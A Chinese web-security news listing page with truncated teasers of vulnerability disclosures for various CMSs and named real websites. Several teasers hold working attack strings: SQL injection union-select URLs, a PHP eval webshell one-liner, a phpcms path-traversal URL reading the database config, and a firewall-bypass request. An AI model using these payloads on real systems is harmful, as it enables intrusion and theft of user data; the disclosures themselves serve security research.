PHP-Barcode 0.3pl1远程代码执行 - 网站安全 - 自学p关注热度:17

PHP-Barcode 0.3pl1 Remote Code ExecutionThe input passed to the code parameter is not sanitized and is used ona popen() function. This allows remote command execution and .....[详情]

OpenX Ad Server 2.8.7跨站请求伪造 - 网站安全 - 自学关注热度:26

Title: OpenX Ad Server CSRF VulnerabilityProduct: OpenX Ad ServerVulnerable version: 2.8.7 and probably earlier versionsFixed version: N/AImpact: HighHomepage: http://www.openx.....[详情]

Musicbox v3.7及以前班多多重缺陷及修复 - 网站安全关注热度:18

============================================================MusicBox = v3.7 Multiple Vulnerabilities============================================================[~] Author : R@1D3N (amin .....[详情]

eNET硅谷动力某页面sql注射缺陷及修复 - 网站安全关注热度:19

简要描述：由于程序员代码编写的疏忽 ，对部分提交的参数未过滤详细说明：http://other.enet.com.cn/zwds/csym_show.jsp?id=-359%20and%201=11%20union%20select%20user(),2,3,4,5,@@version,database(),8,conn.....[详情]

段富超个人网站系统留言本写shell漏洞及修复 -关注热度:25

by Mr.DzY from www.0855.tv源码下载：http://www.mycodes.net/24/2149.htmaddgbook.asp 提交一句话。连接： http://www.2cto.com/date/date3f.asp修复： 过滤..[详情]

114啦网址导航留言本注入及修复 - 网站安全 - 自关注热度:72

漏洞文件feedback/feedback.php影响版本=1.5$username = empty($_POST[#39;username#39;]) ? #39;#39; : strip_tags(iconv(#39;UTF-8#39;, #39;GBK#39;, $_POST[#39;username#39;])); $emai.....[详情]

启航通信企业建站CMS系统v1.1注入及后台拿shell缺关注热度:18

这是一套破系统，拿人家源马改改就说是自己的，还收费垃圾系统，还对源马进行了加密。漏洞一大堆后台登录验证文件：!--#include file=conn.asp--!--#include file=../class/Config.asp--!--#include ....[详情]

Phpaa Cms管理后台拿Shell缺陷及修复 - 网站安全 -关注热度:23

编辑网站设置里的网站名称的内容为：123) ;??php eval($_POST[c])?;然后一句话链接：data/website.inc.php{eval($_POST[c])}修复：过滤..[详情]

TapIn Solutions, LLC(calendar.php)盲注缺陷及修复 - 网站关注热度:23

Demo SitesExploithttp://www.2cto.com /calendar.php?ID=28#39;demohttp://www.2cto.com /calendar.php?ID=[blind sql here]NotesTable:userscolumn:user_id,user_name,passworddemo exploithttp://www......[详情]

网易佳能摄影大赛网站存在SQL注入漏洞及修复关注热度:31

详细说明：http://photowoo.go.163.com/show.php?picId=7172 该url存在注入漏洞 漏洞证明：http://photowoo.go.163.com/show.php?picId=7172#39; http://photowoo.go.163.com/show.php?picId=7172 and 1=1.....[详情]

突破一流监控上传小马 - 网站安全 - 自学php关注热度:192

by：闷豆今 看了一个站。 有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置..[详情]

YothCMS遍历目录/默认数据库下载漏洞及修复 - 网站关注热度:60

优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS！YothCMS是由石家庄优斯科技有限公司开发的一套完全开源建站系统，主要面向企业进行快速的建造简洁，高效，易用，安全的..[详情]

Phpcms 2008 sp4服务器任意文件下载漏洞及修复 - 网关注热度:263

admin.php在对filemanager进行调用时，filemanager对文件目录没有很好的限定，导致可以下载服务器上任意可读文件，导致敏感信息泄露或者跨站。详细说明：发现这个漏洞源于对www.wodota.com/..[详情]

PHP在线挂QQ系统设置不当致个人隐私泄漏 - 网站安关注热度:50

PHP在线挂QQ个人隐私泄漏，可导致通过手机腾讯网SID登录QQ，进而进行诈骗、社工等。目前很流行的一个系统，因为对数据文件权限设置不当，可以随意下载，获得用户QQ的SID，众所周知..[详情]

途途外贸企业网站管理系统多处高危漏洞及修复关注热度:27

①留言本任意用户数据库插马②数据库未做防下载处理③注入漏洞④前台XSS代码后台执行影响版本：途途外贸企业网站管理系统工作室版v2.7beat下载地址：http://down.chinaz.com/soft/30850.htm①..[详情]

豆丁文档第三方登陆未验证导致存储型xss - 网站关注热度:23

这豆丁用了很多第三方登陆，又没加验证，导致了存储型xss。很严重，直接蠕虫。影响豆丁的整个功能。http://www.docin.com/app/user/userinfo?userid=57973346修复方案：慎用第三方登陆。作者：r..[详情]

phpcms V9最新任意读文件漏洞 - 网站安全 - 自学p关注热度:28

wooyun,2012年7月23日漏洞利用代码：/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php转载请著名，本文来自http://www.wooyun.in/post/7.....[详情]

cookie注入&中转注入笔记 - 网站安全 - 自学ph关注热度:30

ASP脚本中,Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用request(name)但它的效率低下,容易出错,当我们省略具体的集合名称..[详情]

PHP+MYSQL环境下的Cookies爆错注入实战 - 网站安全关注热度:24

混世魔王技巧源于技术，所以你在浏览混世魔王的技术博客的时候，会发现技术形式的文章居多，而且都还算详细，而技巧形式的文章，绝大多数是装逼标题党，内容都点到为止。技术..[详情]

IIS7.5畸形解析拿shell利用方法 - 网站安全 - 自学关注热度:25

目标站:XXXX.com/目标IP 14.1.20.105服务器系统Microsoft-IIS/7.5环境平台ASP.NET这个站是IIS7.5的 拿站过程就不写了 直接讲进入后台准备一个txt 写进我们的asp一句话 还有随便的一张图片然后DOS合并..[详情]

腾讯WEBQQ的持久劫持：反射型XSS到XSS后门的实现关注热度:25

-------------------第一章，这是个什么奇葩的功能-----------------------1. 进入WEBQQ之后，首先是对聊天功能进行了测试，未发现和百度HI一样的问题。2. 而后，查看了WEBQQ的设置功能--》主题设置..[详情]

PHP-Nuke模块(SPChat) SQL注射及修复 - 网站安全 - 自学关注热度:38

作者: Pr0T3cT10n程序开发商: http://www.phpnuke.org影响程序名: PHP-Nuke module(SPChat)版本: All类型: SQL Injection概述:可获取数据库里用户信息缺陷： ## http://www.2cto.com /modules.php?op=.....[详情]

X-Cart Gold 4.5 (products_map.php symb parameter) XSS缺陷 -关注热度:29

标题: X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability作者muts影响版本: X-Cart Gold 4.5开发者地址: http://www.x-cart.com/概要：X-Cart Gold implements a degree o.....[详情]

my.2345.comsql注入 泄漏用户信息 - 网站安全 - 自学关注热度:31

my.2345.com 存在sql注入 泄漏用户信息http://my.2345.com/notebook/jsb_exportData.php?sort=1 存在sql注入漏洞添加新记事http://my.2345.com/notebook/jsb_exportData.php?sort=1%20and 1=2 union sel.....[详情]

再再暴用友ICC网站客服系统任意文件上传漏洞关注热度:43

再再暴用友ICC网站客服系统任意文件上传漏洞，看了一下上一个漏洞：http://www.2cto.com/Article/201206/136635.html，发现可以饶过官方修复。详细说明：测试多个网站均存在漏洞。/home/ecccs/web..[详情]

TXQASP博客 v1.0 豪华版注射漏洞及后台拿webshell 及关注热度:17

影响版本：TXQASP博客v1.0 豪华版注射漏洞下载地址：http://down.chinaz.com/soft/29245.htm漏洞文件：index.asp你妹的，首页都带漏洞漏洞代码：%rz_flid=request(class_id)Set rs=server.CreateObject(ad.....[详情]

对一次韩国站的上传点分析 - 网站安全 - 自学关注热度:45

作者：conqu3Pax.Mac 核心成员群里某人求助上传，老是说突破突破。然后就发了个地址：http://www.2cto.com /club/cafe_bbs.php?cafeid=zmaicaptype=boardsptype=insertmode=insertcode=bookmark_1过了几分.....[详情]

新浪博客储存型XSS漏洞 可加载任意外部js文件关注热度:34

新浪博客找到了一个储存型的XSS，并且成功的绕过限制后，可以插入任意外部js文件。钓鱼啦，蠕虫啦，什么的都可以直接搞了。下面来和大家分析分享一下我寻找这个漏洞并且利用的的..[详情]

智创网站专业级防火墙绕过 - 网站安全 - 自学p关注热度:16

防范sql的部分防护规则可被绕过,继续注入... 很简单，利用iis对复参的特殊处理，即可绕过防护规则.构造如下请求:http://www.51qljr.com/xinxi/shownews.asp?id=(-575)UNION SELECT 1,username,3,4,passwd,6,7....[详情]

大智慧手机版官方SQL注入及默认后台,编辑器上传关注热度:27

大智慧手机版官方漏洞存在以下漏洞：1.SQL注入2.默认后台ADMIN目录3.FCKeditor可上传webshell提权以上3点仅是发现问题，未做拿webshell操作。漏洞证明：1.注入点：http://mo.gw.com.cn/type.php?typei..[详情]